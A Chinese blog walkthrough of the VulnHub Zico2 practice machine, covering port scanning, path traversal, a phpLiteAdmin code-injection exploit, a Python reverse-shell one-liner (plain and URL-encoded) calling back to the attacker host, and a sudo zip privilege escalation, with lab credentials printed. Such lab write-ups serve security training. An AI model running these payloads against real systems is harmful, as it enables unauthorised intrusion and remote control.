漏洞复现 -- Zico 2

于 2024-06-29 13:02:38 发布
阅读量170 收藏 4
点赞数 5
文章标签: 网络安全 安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80854251/article/details/140062634
版权

一、靶机地址

https://www.vulnhub.com/entry/zico2-1,210/

二、漏洞复现

1、扫描主机
sudo arp-scan -l
kali: 192.168.159.128
靶机: 192.168.159.151

2、扫描端口
nmap -p- 192.168.159.151 --min-rate=5000

3、进行脚本扫描,TCP扫描,扫描服务版本
nmap -p22,80,111,43360 -sC -sT -sV 192.168.159.151

4、查看开放端口80,寻找有用信息
http:192.168.159.151

5、查看网站,发现可疑站点
一通乱点,发现该网页可能存在文件包含漏洞,尝试拼接路径

6、拼接路径,发现敏感信息
http://192.168.159.151/view.php?page=../../../../../../../etc/passwd

7、扫描目录
dirb http://192.168.159.151
# 扫描到数据库管理员的目录,访问查看

http://192.168.159.151/dbadmin

8、登录数据库管理员用户
查看test_db.php
http://192.168.159.151/dbadmin/test_db.php

尝试弱口令登录 admin

9、查询数据库内容
查询数据库内容

10、尝试远程登录,失败
MD5解密
root--34kroot34
zico--zico2215@
尝试ssh远程连接
ssh root@192.168.159.151
ssh zico@192.168.159.151

全部登陆失败

11、在kali上搜索相关漏洞
在kali查询phpLiteAdmin有没有可利用的漏洞

searchsploit phpliteadmin

结果显示1.9.3版本存在远程php代码注入漏洞
searchsploit -m 24044

cat 24044.txt
可创建.php文件

在刚才的phpLiteAdmin管理页面创建一个hack.php数据库,再在该数据库下创建一个名称为test的表,字段为1

创建成功,访问
http://192.168.159.151/view.php?page=../../usr/databases/hack.php

12、反弹shell
使用python反弹shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.159.128",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

url编码--》》

python%20-c%20'import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%22192.168.159.128%22%2C7777))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3Dsubprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B'

http://192.168.159.151/view.php?page=../../usr/databases/shell.php&cmd=python%20-c%20'import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%22192.168.159.128%22%2C7777))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3Dsubprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B'
kali开启监听
nc -lvvp 7777

13、提权
cd /home/zico
ls -la
cd wordpress
ls -la
cat wp-config.php
发现账号密码
zico | sWfCsfJSPV9H3AmQzw8

ssh zico@192.168.159.151

sudo -l
touch /tmp/tiquan
sudo -u root zip /tmp/tiquan.zip /tmp/tiquan -T --unzip-command="sh -c /bin/bash"
cd /root
冷酷小帅~0x7e
关注
  • 5
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
VMware的Zico2虚拟机
05-12
VMware的Zico2虚拟机
zico2靶机
薛定谔嘚喵博客
03-19 367
文件包含,远程php代码执行漏洞,一句话木马
vulnhub zico2
m0_64815693的博客
02-20 1881
vulnhub zico2
vulnhub/zico2
最新发布
qq_45230030的博客
04-23 431
下载地址:GitHub - rishabhkant07/Privilege-Escalation-Cheatsheet-Vulnhub-: This is a Cheatsheet for CTF Challenges categorized by different Privilege Escalation Methods其中也附有相应的WP,也是有很多种方法,怎么方便怎么来吧。下载完靶机,更改网络为NAT模式,与攻击机设置为同一网卡模式。攻击机(kali)IP:192.168.59.143。
Vulnhub实战:zico2
qq_24033605的博客
08-12 242
描述: 收集信息: 靶机开放了三个端口,ssh,http,rpc。 先进入80端口进行查看。 发现个文件包含漏洞。 尝试读取passwd文件 成功读取后,进行目录扫描。 找到了几个目录,看着dbadmin像是后台数据库,查看一下 尝试了几个弱密码,是admin 查看数据库发现两个用户信息,一个是root,一个是zico,md5爆破密码。 尝试ssh登录,发现密码不对,返回去找了个phpliteadmin的漏洞。 按照上述步骤,创建数据库,创建表,将一句话木马写入。 成功写入,
靶机综合渗透环境(zico2手册).pdf
04-07
靶机综合渗透环境——zico2渗透实战
Zico-Shop.xmind
11-25
Zico-Shop.xmind
Zoomla!逐浪CMS2 x3.9.6.zip
07-16
5、升级:zico升级到v1.5,增加医疗行业图标。 6、修复:内容列表--如节点未允许内容页生成,则不会显示生成按钮 7、改进:内容发布过渡页效果 8、修复:内容列表--生成Html BUG,生成发布时,过滤未审核内容 9、增加:...
Zoomla!逐浪CMS 3.9.6.rar
05-24
2.升级:Bootstrap升级到4.1;3.增加:MarkDown解释CSS样式于V4模板SASS中,从而支持更加友好的显示代码区域;4.增加:专题数据源标签;5.升级:zico升级到1.5,增加医疗行业图标;6.修复:内容列表--如节点未允许内容页...
靶机实战(zico2)
weixin_45605313的博客
05-31 484
zico2实验环境实验过程信息收集主机发现端口扫描网站指纹目录扫描漏洞发现漏洞利用 实验环境 靶机:zico2 测试机: win10 ,kali 实验过程 信息收集 主机发现 靶机IP:192.168.238.156 端口扫描 网站指纹 目录扫描 网站主页 漏洞发现 数据库登录口(弱口令爆破,sql注入,逻辑漏洞等) 密码:admin 进到了数据库 先看到两个用户尝试解密 root:34kroot34 zicozico2215@ 登陆下ssh(登不进去) searchsploit扫到
渗透靶机测试之zico2
hclimg的博客
07-16 621
1.使用nmap扫描,发现主机地址 发现zico2主机地址:192.168.232.130 nmap的-sn参数表示只进行主机发现,不进行端口扫描,然后在浏览器中输入地址,得到首页网站 2.使用nmap进行详细的扫描 -sT -sC -sV 进行系统版本检测 -p- 扫描常用端口 3.使用dirb进行目录浏览 ![在这里插入图片描述](https://img-blog.csdnimg.cn/...
Vulnhub:Zico2靶机
qq_43884092的博客
03-25 169
view.php测试出文件包含,dbadmin目录存在phpliteadmin,搜索该cms,发现该版本存在代码注入,通过弱口令admin进入phpliteadmin后台,写入一句话,在/home/zico/wordpress/wp-config.php发现zico用户的密码
Zico2 渗透测试
Darklord.W
04-11 608
Zico2 渗透测试 0x00实验环境 靶机:zico2,IP地址:192.168.8.202 测试机:Kali,IP地址:192.168.8.145; 0x01实验流程 信息收集——主机发现、端口扫描 渗透测试 0x02实验步骤 netdiscover主机发现 Masscan以及nmap扫描 首先进行masscan扫描 接下来nmap扫描 对服务漏洞进行搜索 ...
zico2靶机练习
weixin_71090536的博客
08-04 283
下方实操中,使用到 攻击机 Kali 和 靶机 zico2两台机器均开启 NAT 模式,比较方便快速扫描。
Vulnhub靶机渗透之zico2
realmels的博客
07-04 602
本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记 前文链接 WAMP/DVWA/sqli-labs 搭建 burpsuite工具抓包及Intruder暴力破解的使用 目录扫描,请求重发,漏洞扫描等工具的使用 网站信息收集及nmap的下载使用 SQL注入(1)——了解成因和手工注入方法 SQL注入(2)——各种注入 SQL注入(3)——SQLMAP SQL注入(4)——实战SQL注入拿webshell Vulnhub之Me and My Girlfriend XSS漏洞 文件上传漏洞 文件上传绕过.
入门靶机渗透之zico2
Yaphst的博客
03-08 5982
靶场介绍 靶机下载地址:点击进入下载界面 下载.ova文件,在VMware中导入该虚拟机,导入完成后配置网卡,确保与自己的攻击机在同一网段,然后开启虚拟机。 Zico 正在尝试建立他的网站,但在选择要使用的 CMS 时遇到了一些麻烦。 在尝试了一些流行的CMS之后,他决定建立自己的。 这是个好主意吗? 目标:拿到root权限,获取flag 信息收集 打开kali,查看kali的IP地址 目标靶机与kali在同一网段,使用nmap对所在网段进行扫描,探测主机 判断192.168.115.134是靶机的
Vulnhub-Zico2靶机实战
御七彩虹猫
03-24 3192
Vulnhub-Zico2靶机实战
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值